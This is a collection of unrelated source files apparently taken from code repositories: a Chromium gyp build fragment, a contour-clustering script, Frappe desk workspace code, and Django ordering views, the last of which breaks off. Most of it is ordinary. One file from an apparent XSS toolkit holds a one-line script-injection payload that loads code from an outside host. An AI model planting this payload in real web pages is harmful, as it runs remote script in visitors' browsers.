['use_aura==0', {
'sources!': [
'nine_image_painter.cc',
'nine_image_painter.h',
],
}],
['OS=="android" and use_aura==0', {
'sources!': [
'path.cc',
],
}],
['OS=="android" and use_aura==1', {
'sources!': [
'screen_android.cc',
],
}],
['OS=="android" and android_webview_build==0', {
'dependencies': [
'<(DEPTH)/base/base.gyp:base_java',
],
}],
['OS=="android" or OS=="ios"', {
'sources!': [
'render_text.cc',
'render_text.h',
'text_utils_skia.cc',
],
}],
['use_x11==1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:x11',
],
}],
['use_pango==1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:pangocairo',
],
'sources!': [
'platform_font_ozone.cc',
'render_text_ozone.cc',
],
}],
['ozone_platform_dri==1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:dridrm',
],
}],
['desktop_linux==1 or chromeos==1', {
'dependencies': [
# font_render_params_linux.cc uses fontconfig
'<(DEPTH)/build/linux/system.gyp:fontconfig',
],
}],
],
'target_conditions': [
# Need 'target_conditions' to override default filename_rules to include
# the file on iOS.
['OS == "ios"', {
'sources/': [
['include', '^scoped_cg_context_save_gstate_mac\\.h$'],
],
}],
],
},
{
'target_name': 'gfx_test_support',
'sources': [
'test/gfx_util.cc',
'test/gfx_util.h',
'test/ui_cocoa_test_helper.h',
'test/ui_cocoa_test_helper.mm',
],
'dependencies': [
'../../base/base.gyp:base',
'../../skia/skia.gyp:skia',
'../../testing/gtest.gyp:gtest',
],
'conditions': [
['OS == "mac"', {
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/AppKit.framework',
],
},
}],
['OS!="ios"', {
'type': 'static_library',
}, { # OS=="ios"
# None of the sources in this target are built on iOS, resulting in
# link errors when building targets that depend on this target
# because the static library isn't found. If this target is changed
# to have sources that are built on iOS, the target should be changed
# to be of type static_library on all platforms.
'type': 'none',
# The cocoa files don't apply to iOS.
'sources/': [
['exclude', 'cocoa']
],
}],
],
},
{
'target_name': 'gfx_unittests',
'type': 'executable',
'sources': [
'range/range_unittest.cc',
],
'dependencies': [
'../../base/base.gyp:run_all_unittests',
'../../testing/gtest.gyp:gtest',
'gfx',
],
}
],
'conditions': [
['OS=="android"' , {
'targets': [
{
'target_name': 'gfx_jni_headers',
'type': 'none',
'sources': [
'../android/java/src/org/chromium/ui/gfx/BitmapHelper.java',
'../android/java/src/org/chromium/ui/gfx/DeviceDisplayInfo.java',
'../android/java/src/org/chromium/ui/gfx/ViewConfigurationHelper.java',
],
'variables': {
'jni_gen_package': 'ui/gfx',
'jni_generator_ptr_type': 'long'
},
'includes': [ '../../build/jni_generator.gypi' ],
},
],
}],
],
}
| 30.868132
| 100
| 0.531209
|
0cd77719898d4dbea322e0f95736775a7565402f
| 6,433
|
py
|
Python
|
experiment-scripts/analyze_contours.py
|
rabitt/icassp-2017-world-music
|
8b1e17842b929bfd334f09a136fa9e297117b695
|
[
"MIT"
] | 2
|
2017-04-07T19:42:27.000Z
|
2017-06-26T01:38:44.000Z
|
experiment-scripts/analyze_contours.py
|
rabitt/icassp-2017-world-music
|
8b1e17842b929bfd334f09a136fa9e297117b695
|
[
"MIT"
] | null | null | null |
experiment-scripts/analyze_contours.py
|
rabitt/icassp-2017-world-music
|
8b1e17842b929bfd334f09a136fa9e297117b695
|
[
"MIT"
] | null | null | null |
"""Contour dictionary learning and singing clusters"""
import numpy as np
import pandas as pd
import pickle
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import spherical_kmeans
import interactive_plot
def align_metadata(contour_files, meta_file):
'''Align metadata to correspond to the order the contour files were processed.
Parameters
----------
contour_files : np.array
List of file names corresponding to each contour.
meta_file : str
Path to a file containing metadata for each recording.
Returns
-------
df : pd.DataFrame
Metadata for the whole dataset ordered in the same way as the contour files.
'''
df = pd.read_csv(meta_file)
uniq_files = np.unique(contour_files)
inds = []
for uniq_file in uniq_files:
inds.append(np.where(df['Csv']==uniq_file)[0][0])
inds = np.array(inds)
df = df.iloc[inds, :].reset_index()
return df
def dictionary_learning(X):
'''Apply spherical Kmeans to learn a dictionary of contour features and
return the cluster encoding.
Parameters
----------
X : np.array
The dataset of countour features (n_samples, n_features).
Returns
-------
embed_matrix : np.array
Spherical K means projection using linear encoding.
'''
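    # Example (sketch): embed_matrix = dictionary_learning(contour_features)
    # returns the linear spherical-k-means encoding of each contour
    # (100 centroids are learned below).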
# preprocessing
X = StandardScaler().fit_transform(X) # scaling
X = PCA(whiten=True).fit_transform(X) # whitening
# spherical Kmeans for dictionary learning
centroids = spherical_kmeans.spherical_kmeans(X, 100, num_iterations=200)
embed_matrix = spherical_kmeans.encode_linear(X, centroids)
return embed_matrix
def histogram_activations(embed_matrix, contour_files):
'''Compute a histogram of kmeans activations for each recording.
Parameters
----------
embed_matrix : np.array
Spherical K means projection.
contour_files : np.array
List of file names corresponding to each contour.
Returns
-------
hist_activations : np.array
Histogram of activations for each recording.
'''
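    # Each output row is the per-recording sum of contour activations,
    # standardized (zero mean, unit variance) across the dictionary atoms.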
uniq_files = np.unique(contour_files)
histograms = []
for uniq_file in uniq_files:
inds = np.where(contour_files == uniq_file)[0]
hist = np.sum(embed_matrix[inds, :], axis=0)
histograms.append((hist-hist.mean()) / hist.std()) # standardize histogram
hist_activations = np.array(histograms)
return hist_activations
def silhouette_K(X, min_ncl=5, max_ncl=20, metric='euclidean'):
'''Run K-means clustering for K in range [min_ncl, max_ncl] and return the
average silhouette score and the number of clusters K with the highest score.
Parameters
----------
X : np.array
The data to be clustered
min_ncl : int
The minimum number of clusters to consider.
max_ncl : int
The maximum number of clusters to consider.
metric : str
The distance metric used in the estimation of the silhouette score,
choice between 'euclidean', 'cosine', 'mahalanobis' etc.
Returns
-------
best_K : int
The K number of clusters with highest silhouette score
average_silhouette : np.array
The average silhouette score for each K in the range [0, max_ncl],
nan values added for K < min_ncl.
'''
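    # Illustrative call: best_K, scores = silhouette_K(X, metric='cosine');
    # scores[best_K] is the highest average silhouette, entries below min_ncl are NaN.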
average_silhouette = []
for i in range(min_ncl):
average_silhouette.append(np.nan)
for ncl in range(min_ncl, max_ncl):
cl_pred = KMeans(n_clusters=ncl, random_state=50).fit_predict(X)
average_silhouette.append(silhouette_score(X, cl_pred, metric=metric))
average_silhouette = np.array(average_silhouette)
best_K = np.nanargmax(average_silhouette)
return best_K, average_silhouette
def create_clusters(data, K=None):
'''Find the optimal K number of clusters using silhouette score and predict
cluster assignment for each sample in the data.
Parameters
----------
data : np.array
The dataset of learned features (n_samples, n_features).
K : int
The number K of clusters.
Returns
-------
cluster_pred : np.array
Cluster assignment for each sample in the data.
'''
if K is None:
K, _ = silhouette_K(data, min_ncl=5, max_ncl=20)
model = KMeans(n_clusters=K, random_state=50).fit(data)
cluster_pred = model.predict(data)
return cluster_pred
def fit_TSNE(data):
'''Fit 2D-TSNE embedding to be able to visualize the high-dimensional data.
Parameters
----------
data : np.array
The dataset of learned features (n_samples, n_features).
Returns
-------
xy_coords : np.array
The 2D coordinates learned by TSNE.
'''
model2D = TSNE(n_components=2, random_state=0)
np.set_printoptions(suppress=True)
xy_coords = model2D.fit_transform(data)
return xy_coords
def main(pickle_file, meta_file, html_file=None):
'''Steps through the analysis of contour features for dictionary learning
and singing style cluster extraction.
Parameters
----------
pickle_file : str
Path to pickle file with precomputed contour features.
meta_file : str
Path to csv file with metadata for each recording.
html_file : str
Path to html file to store the interactive TSNE visualization.
'''
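    # Pipeline (as implemented below): load contour features -> spherical k-means
    # dictionary -> per-recording activation histograms -> K-means clusters -> 2D TSNE.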
# load precomputed contour features
contour_features, contour_files = pickle.load(open(pickle_file, 'rb'))
df = align_metadata(contour_files, meta_file)
embed_matrix = dictionary_learning(contour_features)
hist_activations = histogram_activations(embed_matrix, contour_files)
cluster_pred = create_clusters(hist_activations, K=9)
xy_coords = fit_TSNE(hist_activations)
if html_file is not None:
interactive_plot.plot_2D_scatter(xy_coords[:, 0], xy_coords[:, 1],
labels=cluster_pred, df=df, html_file=html_file)
if __name__ == "__main__":
pickle_file = '../data/contour_data.pickle'
meta_file = '../data/metadata.csv'
#html_file = '../data/TSNE.html'
html_file = None
main(pickle_file, meta_file, html_file)
| 31.077295
| 85
| 0.665475
|
8b5260d1b86474693562e2e30676b4d40c383db2
| 248
|
py
|
Python
|
tests/conftest.py
|
wheerd/cloudformation-to-terraform
|
5411b33293e1f7d7673bb5d4cb52ff0537240db3
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
wheerd/cloudformation-to-terraform
|
5411b33293e1f7d7673bb5d4cb52ff0537240db3
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
wheerd/cloudformation-to-terraform
|
5411b33293e1f7d7673bb5d4cb52ff0537240db3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Dummy conftest.py for cloudformation_to_terraform.
If you don't know what this is for, just leave it empty.
Read more about conftest.py under:
https://pytest.org/latest/plugins.html
"""
# import pytest
| 22.545455
| 60
| 0.677419
|
94a38a5304f8f9dba1e4817302e55f9171e6ac5e
| 16,082
|
py
|
Python
|
frappe/desk/desktop.py
|
finaxar/frappe
|
6da30361813c5de267889ef4970c323c626c02a3
|
[
"MIT"
] | null | null | null |
frappe/desk/desktop.py
|
finaxar/frappe
|
6da30361813c5de267889ef4970c323c626c02a3
|
[
"MIT"
] | null | null | null |
frappe/desk/desktop.py
|
finaxar/frappe
|
6da30361813c5de267889ef4970c323c626c02a3
|
[
"MIT"
] | 1
|
2020-09-03T18:16:50.000Z
|
2020-09-03T18:16:50.000Z
|
# Copyright (c) 2020, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# Author - Shivam Mishra <shivam@frappe.io>
from __future__ import unicode_literals
import frappe
from json import loads, dumps
from frappe import _, DoesNotExistError, ValidationError, _dict
from frappe.boot import get_allowed_pages, get_allowed_reports
from six import string_types
from functools import wraps
from frappe.cache_manager import (
build_domain_restriced_doctype_cache,
build_domain_restriced_page_cache,
build_table_count_cache
)
def handle_not_exist(fn):
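	# Decorator: if the wrapped call raises DoesNotExistError, pop the queued
	# error message and return an empty list so the workspace still renders.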
@wraps(fn)
def wrapper(*args, **kwargs):
try:
return fn(*args, **kwargs)
except DoesNotExistError:
if frappe.message_log:
frappe.message_log.pop()
return []
return wrapper
class Workspace:
def __init__(self, page_name, minimal=False):
self.page_name = page_name
self.extended_cards = []
self.extended_charts = []
self.extended_shortcuts = []
self.user = frappe.get_user()
self.allowed_modules = self.get_cached('user_allowed_modules', self.get_allowed_modules)
self.doc = self.get_page_for_user()
if self.doc.module not in self.allowed_modules:
raise frappe.PermissionError
self.can_read = self.get_cached('user_perm_can_read', self.get_can_read_items)
self.allowed_pages = get_allowed_pages(cache=True)
self.allowed_reports = get_allowed_reports(cache=True)
if not minimal:
self.onboarding_doc = self.get_onboarding_doc()
self.onboarding = None
self.table_counts = get_table_with_counts()
self.restricted_doctypes = frappe.cache().get_value("domain_restricted_doctypes") or build_domain_restriced_doctype_cache()
self.restricted_pages = frappe.cache().get_value("domain_restricted_pages") or build_domain_restriced_page_cache()
def is_page_allowed(self):
cards = self.doc.cards + get_custom_reports_and_doctypes(self.doc.module) + self.extended_cards
shortcuts = self.doc.shortcuts + self.extended_shortcuts
for section in cards:
links = loads(section.links) if isinstance(section.links, string_types) else section.links
for item in links:
if self.is_item_allowed(item.get('name'), item.get('type')):
return True
def _in_active_domains(item):
if not item.restrict_to_domain:
return True
else:
return item.restrict_to_domain in frappe.get_active_domains()
for item in shortcuts:
if self.is_item_allowed(item.link_to, item.type) and _in_active_domains(item):
return True
return False
def get_cached(self, cache_key, fallback_fn):
_cache = frappe.cache()
value = _cache.get_value(cache_key, user=frappe.session.user)
if value:
return value
value = fallback_fn()
		# Expire every six hours
_cache.set_value(cache_key, value, frappe.session.user, 21600)
return value
def get_can_read_items(self):
if not self.user.can_read:
self.user.build_permissions()
return self.user.can_read
def get_allowed_modules(self):
if not self.user.allow_modules:
self.user.build_permissions()
return self.user.allow_modules
def get_page_for_user(self):
filters = {
'extends': self.page_name,
'for_user': frappe.session.user
}
pages = frappe.get_all("Desk Page", filters=filters, limit=1)
if pages:
return frappe.get_cached_doc("Desk Page", pages[0])
self.get_pages_to_extend()
return frappe.get_cached_doc("Desk Page", self.page_name)
def get_onboarding_doc(self):
# Check if onboarding is enabled
if not frappe.get_system_settings("enable_onboarding"):
return None
if not self.doc.onboarding:
return None
if frappe.db.get_value("Module Onboarding", self.doc.onboarding, "is_complete"):
return None
doc = frappe.get_doc("Module Onboarding", self.doc.onboarding)
# Check if user is allowed
allowed_roles = set(doc.get_allowed_roles())
user_roles = set(frappe.get_roles())
if not allowed_roles & user_roles:
return None
# Check if already complete
if doc.check_completion():
return None
return doc
def get_pages_to_extend(self):
pages = frappe.get_all("Desk Page", filters={
"extends": self.page_name,
'restrict_to_domain': ['in', frappe.get_active_domains()],
'for_user': '',
'module': ['in', self.allowed_modules]
})
pages = [frappe.get_cached_doc("Desk Page", page['name']) for page in pages]
for page in pages:
self.extended_cards = self.extended_cards + page.cards
self.extended_charts = self.extended_charts + page.charts
self.extended_shortcuts = self.extended_shortcuts + page.shortcuts
def is_item_allowed(self, name, item_type):
item_type = item_type.lower()
if item_type == "doctype":
return (name in self.can_read and name in self.restricted_doctypes)
if item_type == "page":
return (name in self.allowed_pages and name in self.restricted_pages)
if item_type == "report":
return name in self.allowed_reports
if item_type == "help":
return True
if item_type == "dashboard":
return True
return False
def build_workspace(self):
self.cards = {
'label': _(self.doc.cards_label),
'items': self.get_cards()
}
self.charts = {
'label': _(self.doc.charts_label),
'items': self.get_charts()
}
self.shortcuts = {
'label': _(self.doc.shortcuts_label),
'items': self.get_shortcuts()
}
if self.onboarding_doc:
self.onboarding = {
'label': _(self.onboarding_doc.title),
'subtitle': _(self.onboarding_doc.subtitle),
'success': _(self.onboarding_doc.success_message),
'docs_url': self.onboarding_doc.documentation_url,
'items': self.get_onboarding_steps()
}
@handle_not_exist
def get_cards(self):
cards = self.doc.cards
if not self.doc.hide_custom:
cards = cards + get_custom_reports_and_doctypes(self.doc.module)
if len(self.extended_cards):
cards = merge_cards_based_on_label(cards + self.extended_cards)
default_country = frappe.db.get_default("country")
def _doctype_contains_a_record(name):
exists = self.table_counts.get(name, None)
if not exists:
if not frappe.db.get_value('DocType', name, 'issingle'):
exists = frappe.db.count(name)
else:
exists = True
self.table_counts[name] = exists
return exists
def _prepare_item(item):
if item.dependencies:
incomplete_dependencies = [d for d in item.dependencies if not _doctype_contains_a_record(d)]
if len(incomplete_dependencies):
item.incomplete_dependencies = incomplete_dependencies
else:
item.incomplete_dependencies = ""
if item.onboard:
# Mark Spotlights for initial
if item.get("type") == "doctype":
name = item.get("name")
count = _doctype_contains_a_record(name)
item["count"] = count
# Translate label
item["label"] = _(item.label) if item.label else _(item.name)
return item
new_data = []
for section in cards:
new_items = []
if isinstance(section.links, string_types):
links = loads(section.links)
else:
links = section.links
for item in links:
item = _dict(item)
# Condition: based on country
if item.country and item.country != default_country:
continue
# Check if user is allowed to view
if self.is_item_allowed(item.name, item.type):
prepared_item = _prepare_item(item)
new_items.append(prepared_item)
if new_items:
if isinstance(section, _dict):
new_section = section.copy()
else:
new_section = section.as_dict().copy()
new_section["links"] = new_items
new_section["label"] = _(new_section["label"])
new_data.append(new_section)
return new_data
@handle_not_exist
def get_charts(self):
all_charts = []
if frappe.has_permission("Dashboard Chart", throw=False):
charts = self.doc.charts
if len(self.extended_charts):
charts = charts + self.extended_charts
for chart in charts:
if frappe.has_permission('Dashboard Chart', doc=chart.chart_name):
# Translate label
chart.label = _(chart.label) if chart.label else _(chart.chart_name)
all_charts.append(chart)
return all_charts
@handle_not_exist
def get_shortcuts(self):
def _in_active_domains(item):
if not item.restrict_to_domain:
return True
else:
return item.restrict_to_domain in frappe.get_active_domains()
items = []
shortcuts = self.doc.shortcuts
if len(self.extended_shortcuts):
shortcuts = shortcuts + self.extended_shortcuts
for item in shortcuts:
new_item = item.as_dict().copy()
if self.is_item_allowed(item.link_to, item.type) and _in_active_domains(item):
if item.type == "Report":
report = self.allowed_reports.get(item.link_to, {})
if report.get("report_type") in ["Query Report", "Script Report", "Custom Report"]:
new_item['is_query_report'] = 1
else:
new_item['ref_doctype'] = report.get('ref_doctype')
# Translate label
new_item["label"] = _(item.label) if item.label else _(item.link_to)
items.append(new_item)
return items
@handle_not_exist
def get_onboarding_steps(self):
steps = []
for doc in self.onboarding_doc.get_steps():
step = doc.as_dict().copy()
step.label = _(doc.title)
if step.action == "Create Entry":
step.is_submittable = frappe.db.get_value("DocType", step.reference_document, 'is_submittable', cache=True)
steps.append(step)
return steps
@frappe.whitelist()
@frappe.read_only()
def get_desktop_page(page):
"""Applies permissions, customizations and returns the configruration for a page
on desk.
Args:
page (string): page name
Returns:
dict: dictionary of cards, charts and shortcuts to be displayed on website
"""
wspace = Workspace(page)
wspace.build_workspace()
return {
'charts': wspace.charts,
'shortcuts': wspace.shortcuts,
'cards': wspace.cards,
'onboarding': wspace.onboarding,
'allow_customization': not wspace.doc.disable_user_customization
}
@frappe.whitelist()
def get_desk_sidebar_items(flatten=False, cache=True):
"""Get list of sidebar items for desk
"""
pages = []
_cache = frappe.cache()
if cache:
pages = _cache.get_value("desk_sidebar_items", user=frappe.session.user)
if not pages or not cache:
# don't get domain restricted pages
blocked_modules = frappe.get_doc('User', frappe.session.user).get_blocked_modules()
filters = {
'restrict_to_domain': ['in', frappe.get_active_domains()],
'extends_another_page': 0,
'for_user': '',
'module': ['not in', blocked_modules]
}
if not frappe.local.conf.developer_mode:
filters['developer_mode_only'] = '0'
		# pages sorted: pinned-to-top first, pinned-to-bottom last, then by name
order_by = "pin_to_top desc, pin_to_bottom asc, name asc"
all_pages = frappe.get_all("Desk Page", fields=["name", "category"], filters=filters, order_by=order_by, ignore_permissions=True)
pages = []
# Filter Page based on Permission
for page in all_pages:
try:
wspace = Workspace(page.get('name'), True)
if wspace.is_page_allowed():
pages.append(page)
except frappe.PermissionError:
pass
_cache.set_value("desk_sidebar_items", pages, frappe.session.user)
if flatten:
return pages
from collections import defaultdict
sidebar_items = defaultdict(list)
# The order will be maintained while categorizing
for page in pages:
# Translate label
page['label'] = _(page.get('name'))
sidebar_items[page["category"]].append(page)
return sidebar_items
def get_table_with_counts():
counts = frappe.cache().get_value("information_schema:counts")
if not counts:
counts = build_table_count_cache()
return counts
def get_custom_reports_and_doctypes(module):
return [
_dict({
"label": _("Custom Documents"),
"links": get_custom_doctype_list(module)
}),
_dict({
"label": _("Custom Reports"),
"links": get_custom_report_list(module)
}),
]
def get_custom_doctype_list(module):
doctypes = frappe.get_all("DocType", fields=["name"], filters={"custom": 1, "istable": 0, "module": module}, order_by="name")
out = []
for d in doctypes:
out.append({
"type": "doctype",
"name": d.name,
"label": _(d.name)
})
return out
def get_custom_report_list(module):
"""Returns list on new style reports for modules."""
reports = frappe.get_all("Report", fields=["name", "ref_doctype", "report_type"], filters=
{"is_standard": "No", "disabled": 0, "module": module},
order_by="name")
out = []
for r in reports:
out.append({
"type": "report",
"doctype": r.ref_doctype,
"is_query_report": 1 if r.report_type in ("Query Report", "Script Report", "Custom Report") else 0,
"label": _(r.name),
"name": r.name
})
return out
def get_custom_workspace_for_user(page):
"""Get custom page from desk_page if exists or create one
Args:
		page (string): Page name
Returns:
Object: Document object
"""
filters = {
'extends': page,
'for_user': frappe.session.user
}
pages = frappe.get_list("Desk Page", filters=filters)
if pages:
return frappe.get_doc("Desk Page", pages[0])
doc = frappe.new_doc("Desk Page")
doc.extends = page
doc.for_user = frappe.session.user
return doc
@frappe.whitelist()
def save_customization(page, config):
"""Save customizations as a separate doctype in Desk page per user
Args:
page (string): Name of the page to be edited
		config (dict): Dictionary config of all widgets
Returns:
Boolean: Customization saving status
"""
original_page = frappe.get_doc("Desk Page", page)
page_doc = get_custom_workspace_for_user(page)
# Update field values
page_doc.update({
"charts_label": original_page.charts_label,
"cards_label": original_page.cards_label,
"shortcuts_label": original_page.shortcuts_label,
"module": original_page.module,
"onboarding": original_page.onboarding,
"developer_mode_only": original_page.developer_mode_only,
"category": original_page.category
})
config = _dict(loads(config))
if config.charts:
page_doc.charts = prepare_widget(config.charts, "Desk Chart", "charts")
if config.shortcuts:
page_doc.shortcuts = prepare_widget(config.shortcuts, "Desk Shortcut", "shortcuts")
if config.cards:
page_doc.cards = prepare_widget(config.cards, "Desk Card", "cards")
# Set label
page_doc.label = page + '-' + frappe.session.user
try:
if page_doc.is_new():
page_doc.insert(ignore_permissions=True)
else:
page_doc.save(ignore_permissions=True)
except (ValidationError, TypeError) as e:
# Create a json string to log
json_config = dumps(config, sort_keys=True, indent=4)
# Error log body
log = \
"""
page: {0}
config: {1}
exception: {2}
""".format(page, json_config, e)
frappe.log_error(log, _("Could not save customization"))
return False
return True
def prepare_widget(config, doctype, parentfield):
"""Create widget child table entries with parent details
Args:
config (dict): Dictionary containing widget config
doctype (string): Doctype name of the child table
parentfield (string): Parent field for the child table
Returns:
		list: List of Document objects
"""
if not config:
return []
order = config.get('order')
widgets = config.get('widgets')
prepare_widget_list = []
for idx, name in enumerate(order):
wid_config = widgets[name].copy()
# Some cleanup
wid_config.pop("name", None)
# New Doc
doc = frappe.new_doc(doctype)
doc.update(wid_config)
# Manually Set IDX
doc.idx = idx + 1
# Set Parent Field
doc.parentfield = parentfield
prepare_widget_list.append(doc)
return prepare_widget_list
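# Sketch of the `config` shape prepare_widget expects, inferred from the loop above;
# the widget name and fields here are hypothetical:
#   {"order": ["Sales Chart"], "widgets": {"Sales Chart": {"label": "Sales Chart", "chart_name": "Sales"}}}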
@frappe.whitelist()
def update_onboarding_step(name, field, value):
"""Update status of onboaridng step
Args:
name (string): Name of the doc
field (string): field to be updated
value: Value to be updated
"""
frappe.db.set_value("Onboarding Step", name, field, value)
def merge_cards_based_on_label(cards):
"""Merge cards with common label."""
cards_dict = {}
for card in cards:
if card.label in cards_dict:
links = loads(cards_dict[card.label].links) + loads(card.links)
cards_dict[card.label].update(dict(links=dumps(links)))
cards_dict[card.label] = cards_dict.pop(card.label)
else:
cards_dict[card.label] = card
return list(cards_dict.values())
| 27.074074
| 131
| 0.719811
|
05a448d530b35f473a11bfc66ad6776b9ca3615b
| 121
|
py
|
Python
|
payloads/shortest.py
|
redcode-labs/poXSSon
|
7046fac15e54e05a73d7d46a00916161d9f36cca
|
[
"ISC"
] | 18
|
2022-02-20T13:27:36.000Z
|
2022-03-23T21:35:13.000Z
|
payloads/shortest.py
|
redcode-labs/poXSSon
|
7046fac15e54e05a73d7d46a00916161d9f36cca
|
[
"ISC"
] | 1
|
2022-02-20T13:37:20.000Z
|
2022-02-21T14:38:26.000Z
|
payloads/shortest.py
|
redcode-labs/poXSSon
|
7046fac15e54e05a73d7d46a00916161d9f36cca
|
[
"ISC"
] | 2
|
2022-02-20T13:35:56.000Z
|
2022-02-21T11:59:15.000Z
|
#!/usr/bin/python3
name="shortest"
description="The shortest payload for XSS injection"
payload = "<script src=//14.rs>"
| 30.25
| 52
| 0.735537
|
89de9b64d48de702f4dc73bea63175b43791f4b7
| 12,702
|
py
|
Python
|
backend/takeout/customer/views.py
|
BillBillBillBill/laughing-garbanzo
|
27c66dcc4f0e045ae060255679a2aa68c0f744d2
|
[
"MIT"
] | 15
|
2016-08-03T08:11:36.000Z
|
2022-03-24T03:21:06.000Z
|
backend/takeout/customer/views.py
|
BillBillBillBill/laughing-garbanzo
|
27c66dcc4f0e045ae060255679a2aa68c0f744d2
|
[
"MIT"
] | null | null | null |
backend/takeout/customer/views.py
|
BillBillBillBill/laughing-garbanzo
|
27c66dcc4f0e045ae060255679a2aa68c0f744d2
|
[
"MIT"
] | 7
|
2016-08-03T08:11:38.000Z
|
2020-12-27T08:49:10.000Z
|
# coding: utf-8
from rest_framework.views import APIView
from models.customer import Customer, DeliveryInformation
from models.order import Order, OrderFood
from models.complaint import Complaint
from bussiness.models.store import Store
from bussiness.models.food import Food
from lib.models.review import FoodReview, OrderReview
from lib.utils.response import JsonResponse, JsonErrorResponse
from lib.utils.misc import get_update_dict_by_list
from lib.utils.token_tools import get_token
class CustomerList(APIView):
def get(self, request):
        # Get the customer list
customers = [customer.to_string() for customer in Customer.objects.all()]
return JsonResponse({"customer_list": customers})
def post(self, request):
        # Register
username = request.json.get("username")
password = request.json.get("password")
nickname = request.json.get("nickname")
account_type = request.json.get("account_type")
if not all([username, password, nickname, account_type]):
return JsonErrorResponse("username, password, nickname, account_type are needed", 400)
new_customer = Customer(
username=username,
password=password,
nickname=nickname,
account_type=account_type
)
try:
new_customer.save()
except Exception, e:
print e
return JsonErrorResponse("Fail:" + e.message)
print "新注册顾客id:", new_customer.id
# 登陆
token = get_token(username, password, "customer")
return JsonResponse({
"id": new_customer.id,
"token": token
})
class CustomerDetail(APIView):
def get(self, request, customer_id):
try:
customer = Customer.objects.get(id=customer_id)
except Customer.DoesNotExist:
return JsonErrorResponse("Customer does not exist", 404)
return JsonResponse({"customer": customer.to_detail_string()})
def put(self, request, customer_id):
        # Update personal information
update_item = ['nickname', 'password']
update_dict = get_update_dict_by_list(update_item, request.json)
modify_num = Customer.objects.filter(id=customer_id).update(**update_dict)
if modify_num == 1:
return JsonResponse({})
return JsonErrorResponse("Update failed", 400)
# Delivery information
class DeliveryInformationList(APIView):
def get(self, request):
        # Get the delivery information list
customer = request.u
if not customer:
return JsonErrorResponse("can't find customer", 404)
delivery_informations = [delivery_information.to_string() for delivery_information in customer.delivery_informations.all()]
return JsonResponse({"delivery_information_list": delivery_informations})
def post(self, request):
        # Add delivery information
owner = request.u
address = request.json.get("address")
phone = request.json.get("phone")
receiver = request.json.get("receiver")
if not all([address, phone, receiver]):
return JsonErrorResponse("address, phone, receiver are needed", 400)
new_delivery_information = DeliveryInformation(
address=address,
phone=phone,
receiver=receiver,
customer=owner,
)
try:
new_delivery_information.save()
except Exception, e:
print e
return JsonErrorResponse("Fail:" + e.message)
print "新收货信息id:", new_delivery_information.id
return JsonResponse({"id": new_delivery_information.id})
class DeliveryInformationDetail(APIView):
def get(self, request, delivery_information_id):
try:
delivery_information = DeliveryInformation.objects.get(id=delivery_information_id)
except DeliveryInformation.DoesNotExist:
return JsonErrorResponse("DeliveryInformation does not exist", 404)
return JsonResponse({"delivery_information": delivery_information.to_detail_string()})
def put(self, request, delivery_information_id):
        # Update delivery information
try:
owner = request.u
update_item = ['address', 'phone', 'receiver']
update_dict = get_update_dict_by_list(update_item, request.json)
modify_num = owner.delivery_informations.filter(id=delivery_information_id).update(**update_dict)
assert modify_num == 1
return JsonResponse({})
except Exception, e:
return JsonErrorResponse("Update failed:" + e.message, 400)
def delete(self, request, delivery_information_id):
        # Delete delivery information
try:
result = DeliveryInformation.objects.get(id=delivery_information_id).delete()
assert result[0] == 1
return JsonResponse({})
except Exception, e:
return JsonErrorResponse("Delete failed:" + e.message, 400)
# Complaints
class ComplaintList(APIView):
def get(self, request):
        # Get the complaint list
account_type = request.account_type
if account_type == "admin":
complaints = [complaint.to_string() for complaint in Complaint.objects.all()]
return JsonResponse({"complaint_list": complaints})
customer = request.u
if not customer:
return JsonErrorResponse("can't find customer", 404)
complaints = [complaint.to_string() for complaint in customer.complaints.all()]
return JsonResponse({"complaint_list": complaints})
def post(self, request):
        # Add a complaint
try:
owner = request.u
content = request.json.get("content")
store_id = request.json.get("store_id")
store = Store.objects.get(id=store_id)
if not all([content, store]):
return JsonErrorResponse("content, store_id are needed", 400)
new_complaint = Complaint(
content=content,
store=store,
customer=owner,
)
new_complaint.save()
except Exception, e:
print e
return JsonErrorResponse("Fail:" + e.message)
print "新投诉id:", new_complaint.id
return JsonResponse({"id": new_complaint.id})
class ComplaintDetail(APIView):
def get(self, request, complaint_id):
try:
complaint = Complaint.objects.get(id=complaint_id)
except Complaint.DoesNotExist:
return JsonErrorResponse("Complaint does not exist", 404)
return JsonResponse({"complaint": complaint.to_detail_string()})
def put(self, request, complaint_id):
        # Update a complaint
try:
update_item = ['status']
status = request.json.get("status")
assert status in map(lambda i: i[0], Complaint.StatusList), "not valid"
update_dict = get_update_dict_by_list(update_item, request.json)
modify_num = Complaint.objects.filter(id=complaint_id).update(**update_dict)
assert modify_num == 1
return JsonResponse({})
except Exception, e:
return JsonErrorResponse("Update failed:" + e.message, 400)
# Orders
class OrderList(APIView):
def get(self, request):
        # Get the order list
owner = request.u
account_type = request.account_type
if not owner:
return JsonErrorResponse("can't find user", 404)
if account_type != "customer" and account_type != "bussiness":
return JsonErrorResponse("wrong account type", 403)
if account_type == "customer":
orders = [order.to_string() for order in owner.orders.all()]
else:
orders = [order.to_string() for order in owner.store.orders.all()]
return JsonResponse({"order_list": orders})
def post(self, request):
        # Add an order
try:
customer = request.u
note = request.json.get("note")
delivery_information_id = request.json.get("delivery_information_id")
store_id = request.json.get("store_id")
food_list = request.json.get("food_list")
store = Store.objects.get(id=store_id)
total_price = 0
if not all([food_list, delivery_information_id, store]):
return JsonErrorResponse("food_list, delivery_information_id, store_id are needed", 400)
            # Validate food_list
assert isinstance(food_list, list) and len(food_list) > 0, "food_list format wrong"
            # Check stock and compute the total price
for order_food in food_list:
food = store.foods.get(id=order_food['food_id'])
food_count = int(order_food['count'])
total_price += food.price * food_count
assert food.stock > food_count, "food stock is not enough"
            # Check the delivery information
delivery_information = customer.delivery_informations.get(id=delivery_information_id)
            # Check the account type
assert request.account_type == "customer", "only customer can make order"
            # Create the order
new_order = Order(
note=note,
total_price=total_price,
customer=customer,
store=store,
delivery_information=delivery_information
)
new_order.save()
            # Reduce stock and create order_food entries
for order_food in food_list:
